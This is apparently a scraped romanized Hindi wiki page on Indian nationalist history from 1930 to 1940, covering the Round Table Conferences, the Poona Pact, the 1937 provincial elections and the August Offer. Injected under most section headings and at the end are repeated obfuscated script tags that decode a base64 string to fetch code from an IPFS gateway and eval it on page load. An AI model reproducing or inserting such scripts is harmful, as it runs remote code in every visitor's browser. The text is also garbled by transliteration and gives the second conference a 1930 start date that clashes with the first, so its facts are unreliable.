  5. samudr ke kinare basane vale logoan ko namak banane v use ekatrit karane ki chhoot di jaye.

golamej sammelan

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>[[chitr:Second-Round-Table-Conference.jpg|thumb|250px|golamej sammelan, landan]]

'golamej sammelan' 1930 se 1932 ee. ke bich landan mean ayojit hua. is sammelan ka ayojan tatkalin vaisaray l aaurd iravin ki 31 agast, 1929 ee. ki ghoshana ke adhar par hua tha. is sammelan mean l aaurd iravin ne saiman kamishan ki riport prakashit ho jane ke uparant bharat ke naye sanvidhan ki rachana ke lie landan mean 'golamej sammelan' ka prastav rakha. navambar, 1931 ee. mean landan mean 'golamej sammelan' ka ayojan hua, jisamean bharat aur ianglaind ke sabhi rajanitik daloan ke pratinidhiyoan ko amantrit kiya gaya. is sammelan ki adhyakshata ianglaind ke tatkalin pradhanamantri raimje maikdonald ne ki aur tin sammelan ayojit kiye-

  1. pratham golamej sammelan - 12 sitambar, 1930 ee. se 29 janavari, 1931 ee. tak
  2. dvitiy golamej sammelan - 7 sitambar, 1930 ee. se 2 disambar, 1931 ee. tak
  3. tritiy golamej sammelan - 17 navambar, 1932 ee. se 24 disambar, 1932 ee. tak

savinay avajna andolan ki punaravritti

gaandhi ji ke ianglaind pravas ke samay is andolan ko sarakar ne barbarata se dabana chaha. bangal evan uttar pashchim sima praant mean andolan ko buri tarah dabaya gaya. bharat mean ate hi gaandhi ji ne punah andolan ki bagador sanbhali. sarakar ne kaangres ko avaidh ghoshit kar gaandhi ji evan saradar patel sahit lagabhag 1 lakh, 20 hazar logoan ko jeloan mean bhar diya. doosari bar yah andolan 3 janavari, 1932 ee. ko prarambh hua. logoan mean andolan ke prati utsah mean kami dekhkar gaandhi ji 'savinay avajna andolan' ko 7 aprail, 1934 ee. ko sthagati kar diya. subhashachandr bos evan saradar patel jaise netaoan ne gaandhi ji ke is krity ki alochana ki. unhoanne kaha- "gaandhi ji ne pichhale 13 varsh ki mehanat tatha kurbaniyoan par pani pher diya." phalasvaroop gaandhi ji kuchh dinoan ke lie kaangres se alag ho gaye.

sampradayik nirnay

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

'sampradayik nirnay' 4 agast, 1932 ee. ko british pradhanamantri remje mekadonald ke dvara diya gaya. isi nirnay ke adhar par naya bharatiy shasan-vidhan banane vala tha, jis par us samay landan mean golamej sammelan mean vichar-vimarsh chal raha tha aur jo bad mean 1935 ee. mean pas hua. sampradayik nirnay 1909 ee. ke bharatiy shasan-vidhan mean nihit sampradayik pratinidhitv ke siddhant par adharit tha. 1906 ee. mean jab yah spasht ho gaya ki desh ke prashasan mean bharatiyoan ko adhik pratinidhitv dene ke lie prachalit shasan-vidhan mean shighr sanshodhan kiya jaega, tab bharat sthit kuchh aangrez adhikariyoan ne vaisaray l aaurd minto dvitiy ki sath-gaanth se musalamanoan ko prerit kiya ki ve 'hij haeenes' sar aga khaan ke netritv mean ek pratinidhimandal vaisaray ke pas le jaean.

poona samajhauta

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

'poona samajhauta' 24 sitambar, 1932 ee. ko hua. yah samajhauta rashtrapita mahatma gaandhi ki rogashaiya par hua. british pradhanamantri raimje maikadonald ke 'sampradayik nirnay' ke dvara n keval muslimoan ko, balki dalit jati ke hinduoan ko savarn hinduoan se alag karane ke lie bhi prithak pratinidhitv pradan kar diya gaya tha.

gaandhi ji aur harijan utthan

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gaandhi ji ne harijanoan ke utthan ke lie apana bahumooly yogadan diya. prasiddh 'poona samajhaute' ke bad gaandhi ji ne apane apako poori tarah se harijanoan ki seva mean samarpit kar diya. jel se chhootane ke bad unhoanne 1932 ee. mean 'akhil bharatiy chhuachhoot virodhi lig' ki sthapana ki.

kaangres samajavadi dal

chunav parinam (1937 ee.)
praant kul sitean kaangres ko prapt sitean
bangal 250 60
uttar pradesh 228 134
madras 215 159
bambee 175 87
panjab 175 18
bihar 152 95
setral pravians (si.pi.) 112 70
asam 108 35
u disa 60 36
siandh 60 08
uttar-pashchim praant 50 19
kul 1585 721
  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

'kaangres samajavadi dal' ki sthapana 1934 ee. mean achary narendr dev, jayaprakash narayan, minoo masani evan ashok mehata ke prayatnoan se ki gayi thi. is dal ka pratham sammelan 1934 ee. mean patana me hua. is parti ki sthapana ka uddeshy ye maange thian- desh ki arthik vikas ki prakriya rajy dvara niyojit evan niyantrit ho, rajaoan aur zamiandaroan ka unmoolan bagair muavaje ke kiya jae. julaee, 1931 ee. mean bihar mean samajavadi dal ki sthapana jayaprakash narayan, phoolan prasad varma evan kuchh any logoan ne milakar ki.

praantiy vidhanasabha chunav

'bharat sarakar adhiniyam' 1935 ke dvara bharatiyoan ko prantiy shasan prabandh ka adhikar mil gaya. isake parinamasvaroop 1937 ee. mean prantiy vidhanasabhaoan ke chunae hue. kaangres ko sanyukt praant, madras, madhy pradesh, barar, u disa tatha bihar mean poorn bahutamat prapt hua, jabaki keandriy vyavasthapika sabha mean vah sabase b de dal ke roop mean ubhar kar ayi. kaangres ne is ashvasan par ki gavarnar bina vajah hastakshep nahian kareangean, 8 prantoan mean apani sarakar banayi tatha siandh, uttar-pashchim sima praant tatha asam mean mila-jula mantrimandal bana. gair-kaangresi mantrimandal bangal evan panjab bana. panjab mean 'yooniyanist parti' ne aur bangal mean 'krishak praja parti' aur muslim lig ne milakar sarakar banayi. 1937 ee. mean praantiy vidhanasabha chunavoan ke sath hi vidhan parishadoan ke lie bhi chunav sanpann karaye gaye. paanch praantoan, bambee, madras, bangal, bihar aur uttar pradesh ke vidhan parishadoan ke lie sanpann chunav mean kaangres ko aanshik saphalata prapt huee.

is samay muslim lig ne yah prachar karana prarambh kar diya ki muslimoan ka hit kaangres ke hath mean surakshit nahian hai. 1939 ee. mean dvitiy vishvayuddh ke prarambh hone par tatkalin vayasaray l aaurd linalithago ne bharatiy vidhanamandal ki sahamati ke bina bharat ko yuddh mean shamil kar liya tatha desh mean apatakal ki ghoshana kar di. kaangres kary samiti ne yuddh ke uddeshyoan ki ghoshana karane ki maang ki tatha yah bhi maang rakhi ki yuddh ke bad bharat ko svatantr kar diya jaye. sarakar ne is maang ki upeksha ki. vayasaray ne 'aupaniveshik svarajy' ka rata-rataya sanvad bol diya. kaangres karyakarini ke adesh par 15 navambar, 1939 ee. ko praantiy kaangres mantrimandaloan ne istipha de diya. kaangres mantrimandal ke tyagapatr diye jane ke bad muslim lig ne 22 disambar, 1939 ee. ko 'mukti divas' ke roop mean manaya.

vidhanaparishad chunav parinam (1937 ee.)
praant kul sitean kaangres ko prapt sitean
bangal 57 09
uttar pradesh 52 08
madras 46 26
bambee 26 13
bihar 26 08

gaandhi ji ne 17 aktoobar, 1940 ee. ko 'vyaktigat satyagrah andolan' shuroo kiya. yah aandolan ek tarah se 'vyaktigat savinay avajna aandolan' tha. is aandolan ke pahale satyagrahi vinoba bhave the. unhoanne 17 aktoobar, 1940 ee. ko pavanar mean satyagrah shuroo kiya. doosare satyagrahi javaharalal neharoo the. is aandolan ko 'dilli chalo andolan' bhi kaha gaya. is satyagrah ka mukhy uddeshy british sarakar ke us dave ko khokhala sabit karana tha ki bharat ki janata dvitiy vishvayuddh mean sarakar ke sath hai.

agast prastav

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

'agast prastav' ki ghoshana 8 agast, 1940 ee. ko bharat ke tatkalin vayasaray l aaurd linalithago ne ki thi. in prastavoan ke dvara bharat mean rahane vale alp-sankhyakoan ko adhikaanshat: ve chize prapt ho geean, jinaki unhean apeksha bhi nahian thi. muslim lig ne agast prastav ke us bhag ka, jisamean yah pratijna thi ki "bhavi sanvidhan unaki anumati se hi banega", ka svagat kiya, jabaki kaangres ne 'agast prastav' ko poori tarah asvikar kar diya.

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>